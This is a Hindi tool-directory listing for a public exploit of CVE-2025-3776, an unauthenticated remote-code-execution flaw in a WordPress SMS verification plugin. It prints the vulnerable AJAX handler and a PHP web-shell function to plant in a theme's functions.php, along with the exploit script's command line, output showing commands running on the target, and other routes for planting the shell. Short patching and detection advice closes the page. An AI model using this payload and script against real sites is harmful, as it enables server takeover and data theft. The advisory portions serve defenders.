Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-3776 — WordPress Verification SMS with TargetSMS Plugin <= 1.5 रिमोट कोड निष्पादन (RCE) के लिए संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-3776
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-3776

CVE-2025-3776

WordPress Verification SMS with TargetSMS Plugin <= 1.5 रिमोट कोड निष्पादन (RCE) के लिए संवेदनशील है।

रिपॉजिटरी देखें
7111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-3776 - "Verification SMS with TargetSMS" प्लगइन में रिमोट कोड एक्ज़ीक्यूशन <= 1.5

प्लगइन जानकारी

  • प्लगइन का नाम: Verification SMS with TargetSMS
  • कमजोर संस्करण: <= 1.5
  • CVE आईडी: CVE-2025-3776
  • प्रकार: रिमोट कोड एक्ज़ीक्यूशन (RCE)
  • OWASP वर्गीकरण: A1: इंजेक्शन
  • CVSS गंभीरता: 10.0 (गंभीर)
  • आवश्यक विशेषाधिकार: बिना प्रमाणीकरण
  • प्रकाशित तिथि: 23 अप्रैल, 2025

मूल कारण: प्रोग्रामिंग गलती

यह कमजोरी उपयोगकर्ता-नियंत्रित इनपुट पर call_user_func() के उपयोग से उत्पन्न होती है, बिना अनुमत फ़ंक्शनों की सफेद सूची के विरुद्ध सैनिटाइज़ किए। यह एक तार्किक दोष पैदा करता है जहां मेमोरी में कोई भी मौजूदा PHP फ़ंक्शन बिना प्रमाणीकरण के निष्पादित किया जा सकता है, जिससे गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) की स्थिति उत्पन्न होती है।

कमजोर कोड का स्थान

फ़ाइल: /inc/ajax.php

root@kitploit:~
add_action('wp_ajax_nopriv_targetvrHHndler', 'targetvr_ajax_handler');

function targetvr_ajax_handler(){
    $callback = targetvr_get_postData('callback', 'string');

    if ($callback and function_exists($callback)){
        call_user_func($callback);
    } else {
        targetvr_return_json(false);
    }

    wp_die();
}

यह कोड बिना प्रमाणीकरण वाले उपयोगकर्ताओं को मेमोरी में मौजूद किसी भी फ़ंक्शन को ट्रिगर करने की अनुमति देता है, जिसमें दुर्भावनापूर्ण फ़ंक्शन भी शामिल हैं, यदि हमलावर उन्हें लोड करने में सक्षम हो।


इस कमजोरी का परीक्षण कैसे करें

✅ पूर्वापेक्षाएँ

इस कमजोरी का सफलतापूर्वक शोषण करने के लिए, WordPress वातावरण में एक कॉल करने योग्य फ़ंक्शन पहले से मौजूद होना चाहिए। चूंकि WordPress प्लगइन और थीम फ़ंक्शन को ऑटो-लोड कर सकते हैं, हमलावर सक्रिय थीम की functions.php फ़ाइल के माध्यम से अपना स्वयं का फ़ंक्शन इंजेक्ट कर सकता है।

📍 संशोधित करने वाली फ़ाइल:

root@kitploit:~
target.com/wp-content/themes/twentytwentyfour/functions.php

🛠️ functions.php के अंत में निम्नलिखित पेलोड इंजेक्ट करें:

root@kitploit:~
function evil() {
    if (isset($_GET['cmd'])) {
        echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
    } else {
        echo '<pre>' . shell_exec("whoami") . '</pre>';
    }
    exit;
}

✅ यह सुनिश्चित करता है कि evil() फ़ंक्शन मेमोरी में लोड हो जाता है और call_user_func() के माध्यम से निष्पादित होने योग्य हो जाता है।


Python स्क्रिप्ट का उपयोग करके शोषण के चरण

✅ उपयोग:

root@kitploit:~
python3 CVE-2025-3776.py -u http://target.com -c "id"

✅ उदाहरण आउटपुट:

root@kitploit:~
[*] Checking plugin version...
[+] Plugin version detected: 1.5
[+] Plugin is vulnerable. Proceeding with exploitation...
[*] Sending exploit request...
[+] Exploit succeeded!
<pre>uid=1(daemon) gid=1(daemon) groups=1(daemon)</pre>

Exploit By : Nxploited ( Khaled Alenazi )

Python स्क्रिप्ट सहायता मेनू:

root@kitploit:~
usage: CVE-2025-3776.py [-h] -u URL [-c CMD]

CVE-2025-3776 Exploit for TargetSMS Plugin <= 1.5

# Exploit by Nxploited ( Khaled Alenazi )

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target WordPress site URL
  -c, --cmd CMD  Command to execute (default: whoami)

बिना इंजेक्शन के व्यवहार

यदि मेमोरी में कोई evil() फ़ंक्शन या समान उपलब्ध नहीं है:

  • अनुरोध का परिणाम होगा:
root@kitploit:~
{"status":false}
  • इसका मतलब है कि कॉलबैक फ़ंक्शन मौजूद नहीं है, और शोषण सुरक्षित रूप से विफल हो जाता है।

वास्तविक दुनिया के शोषण पथ

  • थीम फ़ाइल इंजेक्शन: सक्रिय थीम की functions.php को संशोधित करें (जैसा प्रदर्शित किया गया)।
  • फ़ाइल मैनेजर प्लगइन्स के माध्यम से: WP File Manager जैसे किसी भी प्लगइन का उपयोग करके evil() युक्त PHP फ़ाइल अपलोड करें।
  • LFI या इन्क्लूड दोषों के माध्यम से: एक मौजूदा लोकल फ़ाइल इन्क्लूजन (LFI) का उपयोग करके अपलोड की गई फ़ाइल को शामिल करें जिसमें एक दुर्भावनापूर्ण फ़ंक्शन हो।

जोखिम और प्रभाव

एक बार दुर्भावनापूर्ण फ़ंक्शन लोड हो जाने पर, बिना प्रमाणीकरण वाला हमलावर यह कर सकता है:

  • मनमाने शेल कमांड निष्पादित करना
  • संवेदनशील सर्वर फ़ाइलें देखना
  • पूर्ण साइट या सर्वर से समझौता करने की ओर बढ़ना

अनुशंसा

  • यदि संस्करण <= 1.5 चल रहा है तो तुरंत प्लगइन को अक्षम या हटा दें
  • wp-admin के माध्यम से फ़ाइल संपादन तक पहुंच प्रतिबंधित करें
  • प्लगइन को पैच करें या सुरक्षित विकल्पों से बदलें

पहचान

पर बार-बार POST अनुरोधों की तलाश करें:

root@kitploit:~
/wp-admin/admin-ajax.php?action=targetvrHHndler

callback=evil या किसी अप्रत्याशित फ़ंक्शन नाम के साथ


कानूनी अस्वीकरण

यह जानकारी केवल शैक्षिक और नैतिक अनुसंधान उद्देश्यों के लिए प्रदान की गई है। लेखक इस जानकारी के उपयोग से होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।


शोषण श्रेय

शोषणकर्ता: Nxploited ( Khaled Alenazi )

टूल डाउनलोड करें